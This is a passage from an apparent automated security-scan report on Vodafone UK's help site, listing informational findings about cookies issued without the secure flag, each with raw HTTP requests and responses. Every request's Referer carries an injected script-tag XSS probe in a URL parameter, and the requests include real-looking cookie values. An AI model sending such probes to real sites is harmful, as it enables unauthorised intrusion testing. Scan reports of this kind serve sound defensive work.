* Uses the built in easing capabilities added In jQuery 1.1
* to offer multiple easing options
*
* TERMS OF USE - jQuery Easi
...[SNIP]...

3.15. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.scrollTo-1.4.2-min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.scrollTo-1.4.2-min.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerpool_ems00820ss=1409288458.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /system/web/view/selfservice/templates/vodafone/js/redesign/jquery.scrollTo-1.4.2-min.js HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&CMD2=contactus34305%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E77994cf3a02&CMD3=business&PARTITION_ID=1&CONFIGURATION=1000
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644608308%3B%20s_invisit%3Dtrue%7C1321644609059%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644609178%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 2262
Content-Type: application/octet-stream
Last-Modified: Tue, 01 Jun 2010 10:26:54 GMT
Accept-Ranges: bytes
ETag: "02b7ff4741cb1:b73"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 19:06:38 GMT
Set-Cookie: BIGipServerpool_ems00820ss=1409288458.20480.0000; path=/

/**
* jQuery.ScrollTo - Easy element scrolling using jQuery.
* Copyright (c) 2007-2009 Ariel Flesler - aflesler(at)gmail(dot)com | http://flesler.blogspot.com
* Dual licensed under MIT and GPL.
...[SNIP]...

3.16. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.selectbox.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.selectbox.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerpool_ems00820ss=754977034.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /system/web/view/selfservice/templates/vodafone/js/redesign/jquery.selectbox.js HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&CMD2=contactus34305%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E77994cf3a02&CMD3=business&PARTITION_ID=1&CONFIGURATION=1000
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644608308%3B%20s_invisit%3Dtrue%7C1321644609059%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644609178%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 9142
Content-Type: application/octet-stream
Last-Modified: Tue, 29 Jun 2010 15:53:44 GMT
Accept-Ranges: bytes
ETag: "0b48840a317cb1:1127"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 19:06:38 GMT
Set-Cookie: BIGipServerpool_ems00820ss=754977034.20480.0000; path=/

/*
* jQuery selectbox plugin
*
* Copyright (c) 2007 Sadri Sahraoui (brainfault.com)
* Licensed under the GPL license and MIT:
* http://www.opensource.org/licenses/GPL-license.php
* http://ww
...[SNIP]...

3.17. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.vdf.formValidation.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.vdf.formValidation.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerpool_ems00820ss=1375734026.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /system/web/view/selfservice/templates/vodafone/js/redesign/jquery.vdf.formValidation.js HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&CMD2=contactus34305%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E77994cf3a02&CMD3=business&PARTITION_ID=1&CONFIGURATION=1000
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644608308%3B%20s_invisit%3Dtrue%7C1321644609059%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644609178%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 25478
Content-Type: application/octet-stream
Last-Modified: Thu, 27 May 2010 15:01:30 GMT
Accept-Ranges: bytes
ETag: "081e47cadfdca1:b66"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 19:06:38 GMT
Set-Cookie: BIGipServerpool_ems00820ss=1375734026.20480.0000; path=/

/*jslint evil: true, forin: true */

//following line used to determine if the class is loaded
vdf.bFVLoaded = true;

/*
* This is a class constructor for the Form message pane object
* Author: Rya
...[SNIP]...

3.18. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.vdf.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.vdf.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerpool_ems00820ss=1426065674.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /system/web/view/selfservice/templates/vodafone/js/redesign/jquery.vdf.js HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&CMD2=contactus34305%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E77994cf3a02&CMD3=business&PARTITION_ID=1&CONFIGURATION=1000
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644608308%3B%20s_invisit%3Dtrue%7C1321644609059%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644609178%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 27480
Content-Type: application/octet-stream
Last-Modified: Tue, 15 Jun 2010 08:45:16 GMT
Accept-Ranges: bytes
ETag: "0b6961367ccb1:b3f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 19:06:38 GMT
Set-Cookie: BIGipServerpool_ems00820ss=1426065674.20480.0000; path=/

/*jslint evil: true, forin: true */

/* Files contains vfLoader, vfContextualHelp, vfModalLayer and init call */

/*
* Vodafone JS information, used in Lazy script load plugin
* Author: Ryan Mitchel
...[SNIP]...

3.19. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.vdf.ui.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/js/redesign/jquery.vdf.ui.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerpool_ems00820ss=1392511242.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /system/web/view/selfservice/templates/vodafone/js/redesign/jquery.vdf.ui.js HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&CMD2=contactus34305%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E77994cf3a02&CMD3=business&PARTITION_ID=1&CONFIGURATION=1000
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644608308%3B%20s_invisit%3Dtrue%7C1321644609059%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644609178%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 16779
Content-Type: application/octet-stream
Last-Modified: Thu, 27 May 2010 15:01:30 GMT
Accept-Ranges: bytes
ETag: "081e47cadfdca1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 19:06:38 GMT
Set-Cookie: BIGipServerpool_ems00820ss=1392511242.20480.0000; path=/

/*jslint evil: true, forin: true */

/* Files contains vfTabs, vdfCarousel, vdfAccordion */

//following line used to determine if the class is loaded
vdf.bUILoaded = true;

/*
* Vodafone Tabs plugin
...[SNIP]...

3.20. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/js/redesign/swfobject.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/js/redesign/swfobject.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerpool_ems00820ss=1426065674.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /system/web/view/selfservice/templates/vodafone/js/redesign/swfobject.js HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&CMD2=contactus34305%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E77994cf3a02&CMD3=business&PARTITION_ID=1&CONFIGURATION=1000
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644608308%3B%20s_invisit%3Dtrue%7C1321644609059%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644609178%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 10220
Content-Type: application/octet-stream
Last-Modified: Thu, 11 Jun 2009 15:14:00 GMT
Accept-Ranges: bytes
ETag: "0ec583fa7eac91:b3f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 19:06:38 GMT
Set-Cookie: BIGipServerpool_ems00820ss=1426065674.20480.0000; path=/

/* SWFObject v2.2 <http://code.google.com/p/swfobject/>
is released under the MIT License <http://www.opensource.org/licenses/mit-license.php>
*/
var swfobject=function(){var D="undefined",r="objec
...[SNIP]...

3.21. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/liveperson/mtagconfig.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/liveperson/mtagconfig.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerpool_ems00820ss=738199818.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /system/web/view/selfservice/templates/vodafone/liveperson/mtagconfig.js HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&CMD2=contactus34305%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E77994cf3a02&CMD3=business&PARTITION_ID=1&CONFIGURATION=1000
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644608308%3B%20s_invisit%3Dtrue%7C1321644609059%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644609178%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 5641
Content-Type: application/octet-stream
Last-Modified: Mon, 29 Mar 2010 11:11:33 GMT
Accept-Ranges: bytes
ETag: "2c7b5c9730cfca1:114c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 19:06:40 GMT
Set-Cookie: BIGipServerpool_ems00820ss=738199818.20480.0000; path=/

// Date last modified = 20100226
// Modified by = YT

var lpMTagConfig = {
   'lpServer' : 'server.lon.liveperson.net',
   'lpNumber' : '90571995',
   'lpProtocol' : (document.location.toString().in
...[SNIP]...

3.22. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/misclinks.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/misclinks.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerpool_ems00820ss=1426065674.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /system/web/view/selfservice/templates/vodafone/misclinks.js HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&CMD2=contactus34305%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E77994cf3a02&CMD3=business&PARTITION_ID=1&CONFIGURATION=1000
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644608308%3B%20s_invisit%3Dtrue%7C1321644609059%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644609178%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 574
Content-Type: application/octet-stream
Last-Modified: Tue, 06 May 2008 09:26:19 GMT
Accept-Ranges: bytes
ETag: "802f933d5bafc81:b3f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 19:06:40 GMT
Set-Cookie: BIGipServerpool_ems00820ss=1426065674.20480.0000; path=/

function submitMiscLinks(cmd, configurationId, partitionId)
{
// special handling of log off request, send log off from the same frame or parent frame
// depending on the deployment i.e frame b
...[SNIP]...

3.23. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/mozInsertAdjacent.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/mozInsertAdjacent.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerpool_ems00820ss=1392511242.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /system/web/view/selfservice/templates/vodafone/mozInsertAdjacent.js HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&CMD2=contactus34305%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E77994cf3a02&CMD3=business&PARTITION_ID=1&CONFIGURATION=1000
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644608308%3B%20s_invisit%3Dtrue%7C1321644609059%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644609178%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 1382
Content-Type: application/octet-stream
Last-Modified: Tue, 06 May 2008 09:26:19 GMT
Accept-Ranges: bytes
ETag: "802f933d5bafc81:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 19:06:40 GMT
Set-Cookie: BIGipServerpool_ems00820ss=1392511242.20480.0000; path=/

// insertAdjacentHTML(), insertAdjacentText() and insertAdjacentElement()
// for Netscape 6/Mozilla by Thor Larholm me@jscript.dk
// Usage: include this code segment at the beginning of your documen
...[SNIP]...

3.24. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/searchinpututil.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/searchinpututil.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerpool_ems00820ss=738199818.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /system/web/view/selfservice/templates/vodafone/searchinpututil.js HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&CMD2=contactus34305%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E77994cf3a02&CMD3=business&PARTITION_ID=1&CONFIGURATION=1000
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644608308%3B%20s_invisit%3Dtrue%7C1321644609059%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644609178%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 36618
Content-Type: application/octet-stream
Last-Modified: Wed, 25 Aug 2010 17:23:33 GMT
Accept-Ranges: bytes
ETag: "21626e3e7a44cb1:114c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 19:06:42 GMT
Set-Cookie: BIGipServerpool_ems00820ss=738199818.20480.0000; path=/

/*
This file conatins the support functions for the searchresultappearance
template.
*/
/**
* Store the topic list in JS array, and use it for
* re-populating the subtopic dropdown, based
...[SNIP]...

3.25. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/searchresultsappearance.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/searchresultsappearance.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerpool_ems00820ss=1442842890.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /system/web/view/selfservice/templates/vodafone/searchresultsappearance.js HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&CMD2=contactus34305%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E77994cf3a02&CMD3=business&PARTITION_ID=1&CONFIGURATION=1000
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644608308%3B%20s_invisit%3Dtrue%7C1321644609059%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644609178%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 3920
Content-Type: application/octet-stream
Last-Modified: Wed, 25 Aug 2010 17:13:38 GMT
Accept-Ranges: bytes
ETag: "e6ea11dc7844cb1:b12"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 18 Nov 2011 19:06:40 GMT
Set-Cookie: BIGipServerpool_ems00820ss=1442842890.20480.0000; path=/

/*
This file conatins the support functions for the searchresultsappearance
template.
*/
function onBeforeUnload()
{
/*Unload caused because of click in the nonclient area of the window */
...[SNIP]...

3.26. https://help.vodafone.co.uk/system/web/view/selfservice/templates/vodafone/sidelinks.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://help.vodafone.co.uk
Path:	/system/web/view/selfservice/templates/vodafone/sidelinks.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

BIGipServerpool_ems00820ss=1459620106.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /system/web/view/selfservice/templates/vodafone/sidelinks.js HTTP/1.1
Host: help.vodafone.co.uk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://help.vodafone.co.uk/system/selfservice.controller?CMD=BROWSE_TOPIC&CMD2=contactus34305%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E77994cf3a02&CMD3=business&PARTITION_ID=1&CONFIGURATION=1000
Cookie: mbox=PC#1321393311388-20138.19#1322852305|check#true#1321642765|session#1321642623709-428964#1321644565; s_pers=%20s_nr%3D1321393421163%7C1323985421163%3B%20s_ev57%3D%255B%255B'Other%2520Websites'%252C'1321642451985'%255D%255D%7C1479495251985%3B%20s_lastvisit%3D1321642452278%7C1416250452278%3B%20s_vnum%3D1323985318576%2526vn%253D2%7C1323985318576%3B%20dl%3D1%7C1321644608308%3B%20s_invisit%3Dtrue%7C1321644609059%3B%20gpv_p32%3Dhel%253ASony%2520Ericsson%2520-%2520Help%2520-%2520Vodafone%7C1321644609178%3B; s_vi=[CS]v1|27616E5E051D1B1C-60000105A00080C0[CE]; web_templates_personalization_cookie#1058#1=topicId:8265

Response

HTTP/1.1 200 OK
